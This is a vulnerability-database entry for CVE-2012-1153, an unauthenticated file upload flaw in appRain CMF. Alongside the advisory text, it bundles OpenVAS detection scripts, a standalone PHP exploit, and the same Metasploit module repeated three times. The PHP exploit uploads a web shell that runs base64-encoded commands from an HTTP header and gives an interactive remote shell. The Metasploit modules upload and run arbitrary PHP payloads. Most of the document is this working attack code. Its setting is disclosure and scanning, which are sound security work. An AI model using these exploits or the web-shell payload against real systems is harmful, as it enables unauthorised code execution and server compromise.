ID CVE-2012-1153 Type cve Reporter cve@mitre.org Modified 2017-08-29T01:31:00
Description
Unrestricted file upload vulnerability in addons/uploadify/uploadify.php in appRain CMF 0.1.5 and earlier allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in the uploads directory.
Per: http://cwe.mitre.org/data/definitions/434.html
'CWE-434: Unrestricted Upload of File with Dangerous Type'
{"openvas": [{"lastseen": "2017-07-02T21:10:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1153"], "description": "appRain CMF is prone to an arbitrary-file-upload vulnerability because\nthe application fails to adequately sanitize user-supplied input.\n\nAn attacker may leverage this issue to upload arbitrary files to the\naffected server; this can result in arbitrary code execution within\nthe context of the vulnerable application.\n\nappRain CMF 0.1.5 and prior versions are vulnerable.", "modified": "2017-03-23T00:00:00", "published": "2012-01-23T00:00:00", "id": "OPENVAS:103395", "href": "http://plugins.openvas.org/nasl.php?oid=103395", "type": "openvas", "title": "appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apprain_51576.nasl 5700 2017-03-23 16:03:37Z cfi $\n#\n# appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"appRain CMF is prone to an arbitrary-file-upload vulnerability because\nthe application fails to adequately sanitize user-supplied input.\n\nAn attacker may leverage this issue to upload arbitrary files to the\naffected server; this can result in arbitrary code execution within\nthe context of the vulnerable application.\n\nappRain CMF 0.1.5 and prior versions are vulnerable.\";\n\nif (description)\n{\n script_id(103395);\n script_cve_id(\"CVE-2012-1153\");\n script_bugtraq_id(51576);\n script_version(\"$Revision: 5700 $\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/51576\");\n script_xref(name : \"URL\" , value : \"http://www.apprain.com\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-23 17:03:37 +0100 (Thu, 23 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:04:51 +0100 (Mon, 23 Jan 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n \nport = get_http_port( default:80 );\nif( ! can_host_php( port:port ) ) exit( 0 );\n\nforeach dir( make_list_unique( \"/apprain\", \"/cms\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/admin/system\";\n buf = http_get_cache( item:url, port:port );\n\n if( \"Start with appRain\" >< buf ) {\n\n host = http_host_name( port:port );\n file = \"openvas-\" + rand() + \".php\";\n ex =\"<?php phpinfo();?>\";\n len = 110 + strlen(ex);\n\n req = string(\"POST \",dir,\"/webroot/addons/uploadify/uploadify.php HTTP/1.0\\r\\n\",\n\t\t \"Host: \",host,\"\\r\\n\",\n\t\t \"Content-Length: \",len,\"\\r\\n\",\n\t\t \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\",\n\t\t \"Connection: close\\r\\n\",\n\t\t \"\\r\\n\",\n\t\t \"--o0oOo0o\\r\\n\",\n\t\t 'Content-Disposition: form-data; name=\"Filedata\"; filename=\"',file,'\"',\"\\r\\n\",\n\t\t \"\\r\\n\",\n\t\t ex,\"\\r\\n\",\n\t\t \"--o0oOo0o--\\r\\n\\r\\n\");\n result = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n if( file >!< result ) continue;\n\n url = dir + \"/addons/uploadify/uploads/\" + file;\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\\(\\)\" ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-05-08T19:08:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1153"], "description": "appRain CMF is prone to an arbitrary-file-upload vulnerability because\n the application fails to adequately sanitize user-supplied input.", "modified": "2020-05-06T00:00:00", "published": "2012-01-23T00:00:00", "id": "OPENVAS:1361412562310103395", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103395", "type": "openvas", "title": "appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103395\");\n script_cve_id(\"CVE-2012-1153\");\n script_bugtraq_id(51576);\n script_version(\"2020-05-06T06:57:16+0000\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"appRain CMF 'uploadify.php' Remote Arbitrary File Upload Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/51576\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 06:57:16 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:04:51 +0100 (Mon, 23 Jan 2012)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"summary\", value:\"appRain CMF is prone to an arbitrary-file-upload vulnerability because\n the application fails to adequately sanitize user-supplied input.\");\n\n script_tag(name:\"impact\", value:\"An attacker may leverage this issue to upload arbitrary files to the\n affected server, this can result in arbitrary code execution within\n the context of the vulnerable application.\");\n\n script_tag(name:\"affected\", value:\"appRain CMF 0.1.5 and prior versions are vulnerable.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since\n the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are\n to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port( default:80 );\nif( ! http_can_host_php( port:port ) )\n exit( 0 );\n\nhost = http_host_name( port:port );\n\nforeach dir( make_list_unique( \"/apprain\", \"/cms\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n buf = http_get_cache( item:dir + \"/admin/system\", port:port );\n\n if( \"Start with appRain\" >< buf ) {\n\n vtstrings = get_vt_strings();\n file = vtstrings[\"lowercase_rand\"] + \".php\";\n ex =\"<?php phpinfo();?>\";\n len = 110 + strlen(ex);\n\n req = string(\"POST \", dir, \"/webroot/addons/uploadify/uploadify.php HTTP/1.0\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Length: \", len, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\",\n \"Connection: close\\r\\n\",\n \"\\r\\n\",\n \"--o0oOo0o\\r\\n\",\n 'Content-Disposition: form-data; name=\"Filedata\"; filename=\"',file,'\"',\"\\r\\n\",\n \"\\r\\n\",\n ex,\"\\r\\n\",\n \"--o0oOo0o--\\r\\n\\r\\n\");\n result = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n if( file >!< result ) continue;\n\n url = dir + \"/addons/uploadify/uploads/\" + file;\n if( http_vuln_check( port:port, url:url, pattern:\"<title>phpinfo\\(\\)\" ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "description": "File upload vulnerability in appRain (uploadify.php)\n\nVulnerability Type: File Upload", "modified": "2013-04-02T00:00:00", "published": "2012-04-27T00:00:00", "id": "E-127", "href": "", "type": "dsquare", "title": "appRain 0.1.5 File Upload", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T09:39:02", "description": "appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit. CVE-2012-1153. Webapps exploit for php platform", "published": "2012-01-19T00:00:00", "type": "exploitdb", "title": "appRain CMF <= 0.1.5 uploadify.php Unrestricted File Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "modified": "2012-01-19T00:00:00", "id": "EDB-ID:18392", "href": "https://www.exploit-db.com/exploits/18392/", "sourceData": "<?php\r\n\r\n/*\r\n ---------------------------------------------------------------------\r\n appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit\r\n ---------------------------------------------------------------------\r\n \r\n author............: Egidio Romano aka EgiX\r\n mail..............: n0b0d13s[at]gmail[dot]com\r\n software link.....: http://www.apprain.com/\r\n \r\n +-------------------------------------------------------------------------+\r\n | This proof of concept code was written for educational purpose only. |\r\n | Use it at your own risk. Author will be not responsible for any damage. |\r\n +-------------------------------------------------------------------------+\r\n \r\n [-] vulnerable code in /webroot/addons/uploadify/uploadify.php\r\n \r\n 27. if (!empty($_FILES)) {\r\n 28. $tempFile = $_FILES['Filedata']['tmp_name'];\r\n 29. //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';\r\n 30. $targetFile = \"uploads/\" . $_FILES['Filedata']['name'];\r\n 31. \r\n 32. // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);\r\n 33. // $fileTypes = str_replace(';','|',$fileTypes);\r\n 34. // $typesArray = split('\\|',$fileTypes);\r\n 35. // $fileParts = pathinfo($_FILES['Filedata']['name']);\r\n 36. \r\n 37. // if (in_array($fileParts['extension'],$typesArray)) {\r\n 38. // Uncomment the following line if you want to make the directory if it doesn't exist\r\n 39. // mkdir(str_replace('//','/',$targetPath), 0755, true);\r\n 40. \r\n 41. move_uploaded_file($tempFile,$targetFile);\r\n 42. echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);\r\n 43. // } else {\r\n 44. // echo 'Invalid file type.';\r\n 45. // }\r\n 46. }\r\n \r\n Restricted access to this script isn't properly realized, so an attacker might be able to upload\r\n arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.\r\n \r\n [-] Possible bug fix:\r\n \r\n include_once('../../../app.php');\r\n App::__Obj('appRain_Base_Core')->check_admin_login(); \r\n \r\n add this lines of code at the beginning of the script\r\n \r\n [-] Disclosure timeline:\r\n \r\n [19/12/2011] - Vulnerability discovered\r\n [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135\r\n [20/12/2011] - Vendor response and fix suggested \r\n [16/01/2012] - After four weeks still no fix released\r\n [19/01/2012] - Public disclosure\r\n \r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die(\"\\n[-] No response from {$host}:80\\n\");\r\n \r\n fputs($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n\r\nprint \"\\n+---------------------------------------------------------------+\";\r\nprint \"\\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |\";\r\nprint \"\\n+---------------------------------------------------------------+\\n\";\r\n \r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /apprain-v015/\\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"--o0oOo0o\\r\\n\";\r\n$payload .= \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"sh.php\\\"\\r\\n\\r\\n\";\r\n$payload .= \"<?php error_reporting(0); print(___); passthru(base64_decode(\\$_SERVER[HTTP_CMD]));\\r\\n\";\r\n$payload .= \"--o0oOo0o--\\r\\n\";\r\n\r\n$packet = \"POST {$path}addons/uploadify/uploadify.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: multipart/form-data; boundary=o0oOo0o\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n \r\nif (!preg_match('/sh.php/', http_send($host, $packet))) die(\"\\n[-] Upload failed!\\n\");\r\n\r\n$packet = \"GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n \r\nwhile(1)\r\n{\r\n print \"\\napprain-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n $response = http_send($host, sprintf($packet, base64_encode($cmd)));\r\n preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\n?>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18392/"}, {"lastseen": "2016-02-02T10:43:14", "description": "appRain CMF Arbitrary PHP File Upload Vulnerability. CVE-2012-1153. Webapps exploit for php platform", "published": "2012-05-25T00:00:00", "type": "exploitdb", "title": "appRain CMF Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "modified": "2012-05-25T00:00:00", "id": "EDB-ID:18922", "href": "https://www.exploit-db.com/exploits/18922/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"appRain CMF Arbitrary PHP File Upload Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in appRain's Content Management\r\n\t\t\t\tFramework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a\r\n\t\t\t\tmalicious user can upload a file to the uploads/ directory without any\r\n\t\t\t\tauthentication, which results in arbitrary code execution.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'EgiX', #Discovery, PoC\r\n\t\t\t\t\t'sinn3r' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2012-1153'],\r\n\t\t\t\t\t['OSVDB', '78473'],\r\n\t\t\t\t\t['EDB', '18392']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"none\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => ['php'],\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['appRain 0.1.5 or less', {}]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Jan 19 2012\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\t\turi << '/' if uri[-1,1] != '/'\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"#{uri}addons/uploadify/uploadify.php\"\r\n\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body.empty?\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\turi = target_uri.path\r\n\t\turi << '/' if uri[-1,1] != '/'\r\n\r\n\t\tpeer = \"#{rhost}:#{rport}\"\r\n\t\tpayload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'\r\n\r\n\t\tpost_data = \"--o0oOo0o\\r\\n\"\r\n\t\tpost_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\"\r\n\t\tpost_data << \"<?php \"\r\n\t\tpost_data << payload.encoded\r\n\t\tpost_data << \" ?>\\r\\n\"\r\n\t\tpost_data << \"--o0oOo0o\\r\\n\"\r\n\r\n\t\tprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'uri' => \"#{uri}addons/uploadify/uploadify.php\",\r\n\t\t\t'ctype' => 'multipart/form-data; boundary=o0oOo0o',\r\n\t\t\t'data' => post_data\r\n\t\t})\r\n\r\n\t\t# If the server returns 200 and the body contains our payload name,\r\n\t\t# we assume we uploaded the malicious file successfully\r\n\t\tif not res or res.code != 200 or res.body !~ /#{payload_name}/\r\n\t\t\tprint_error(\"#{peer} - I don't think the file was uploaded. Abort!\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\")\r\n\t\t# Execute our payload\r\n\t\tres = send_request_cgi({\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'uri' => \"#{uri}addons/uploadify/uploads/#{payload_name}\"\r\n\t\t})\r\n\r\n\t\t# If we don't get a 200 when we request our malicious payload, we suspect\r\n\t\t# we don't have a shell, either. Print the status code for debugging purposes.\r\n\t\tif res and res.code != 200\r\n\t\t\tprint_status(\"#{peer} - Server returns #{res.code.to_s}\")\r\n\t\tend\r\n\tend\r\nend", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18922/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:22", "description": "", "published": "2012-05-24T00:00:00", "type": "packetstorm", "title": "appRain CMF Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "modified": "2012-05-24T00:00:00", "id": "PACKETSTORM:113001", "href": "https://packetstormsecurity.com/files/113001/appRain-CMF-Arbitrary-PHP-File-Upload-Vulnerability.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"appRain CMF Arbitrary PHP File Upload Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in appRain's Content Management \nFramework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a \nmalicious user can upload a file to the uploads/ directory without any \nauthentication, which results in arbitrary code execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'EgiX', #Discovery, PoC \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n['CVE', '2012-1153'], \n['OSVDB', '78473'], \n['EDB', '18392'] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['appRain 0.1.5 or less', {}] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jan 19 2012\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5']) \n], self.class) \nend \n \ndef check \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}addons/uploadify/uploadify.php\" \n}) \n \nif res and res.code == 200 and res.body.empty? \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1,1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \npayload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php' \n \npost_data = \"--o0oOo0o\\r\\n\" \npost_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\" \npost_data << \"<?php \" \npost_data << payload.encoded \npost_data << \" ?>\\r\\n\" \npost_data << \"--o0oOo0o\\r\\n\" \n \nprint_status(\"#{peer} - Sending PHP payload (#{payload_name})\") \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}addons/uploadify/uploadify.php\", \n'ctype' => 'multipart/form-data; boundary=o0oOo0o', \n'data' => post_data \n}) \n \n# If the server returns 200 and the body contains our payload name, \n# we assume we uploaded the malicious file successfully \nif not res or res.code != 200 or res.body !~ /#{payload_name}/ \nprint_error(\"#{peer} - I don't think the file was uploaded. Abort!\") \nreturn \nend \n \nprint_status(\"#{peer} - Executing PHP payload (#{payload_name})\") \n# Execute our payload \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => \"#{uri}addons/uploadify/uploads/#{payload_name}\" \n}) \n \n# If we don't get a 200 when we request our malicious payload, we suspect \n# we don't have a shell, either. Print the status code for debugging purposes. \nif res and res.code != 200 \nprint_status(\"#{peer} - Server returns #{res.code.to_s}\") \nend \nend \nend`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/113001/apprain_upload_exec.rb.txt"}], "metasploit": [{"lastseen": "2020-10-13T00:37:37", "description": "This module exploits a vulnerability found in appRain's Content Management Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a malicious user can upload a file to the uploads/ directory without any authentication, which results in arbitrary code execution.\n", "published": "2012-05-23T22:50:13", "type": "metasploit", "title": "appRain CMF Arbitrary PHP File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1153"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/APPRAIN_UPLOAD_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"appRain CMF Arbitrary PHP File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in appRain's Content Management\n Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a\n malicious user can upload a file to the uploads/ directory without any\n authentication, which results in arbitrary code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'EgiX', #Discovery, PoC\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2012-1153'],\n ['OSVDB', '78473'],\n ['EDB', '18392'],\n ['BID', '51576']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['appRain 0.1.5 or less', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2012-01-19',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])\n ])\n end\n\n def check\n uri = target_uri.path\n uri << '/' if uri[-1,1] != '/'\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php')\n })\n\n if res and res.code == 200 and res.body.empty?\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n uri = target_uri.path\n\n peer = \"#{rhost}:#{rport}\"\n payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'\n\n post_data = \"--o0oOo0o\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"Filedata\\\"; filename=\\\"#{payload_name}\\\"\\r\\n\\r\\n\"\n post_data << \"<?php \"\n post_data << payload.encoded\n post_data << \" ?>\\r\\n\"\n post_data << \"--o0oOo0o\\r\\n\"\n\n print_status(\"Sending PHP payload (#{payload_name})\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, \"addons/uploadify/uploadify.php\"),\n 'ctype' => 'multipart/form-data; boundary=o0oOo0o',\n 'data' => post_data\n })\n\n # If the server returns 200 and the body contains our payload name,\n # we assume we uploaded the malicious file successfully\n if not res or res.code != 200 or res.body !~ /#{payload_name}/\n print_error(\"File wasn't uploaded, aborting!\")\n return\n end\n\n print_status(\"Executing PHP payload (#{payload_name})\")\n # Execute our payload\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, \"addons/uploadify/uploads/#{payload_name}\")\n })\n\n # If we don't get a 200 when we request our malicious payload, we suspect\n # we don't have a shell, either. Print the status code for debugging purposes.\n if res and res.code != 200\n print_status(\"Server returned #{res.code.to_s}\")\n end\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apprain_upload_exec.rb"}]}
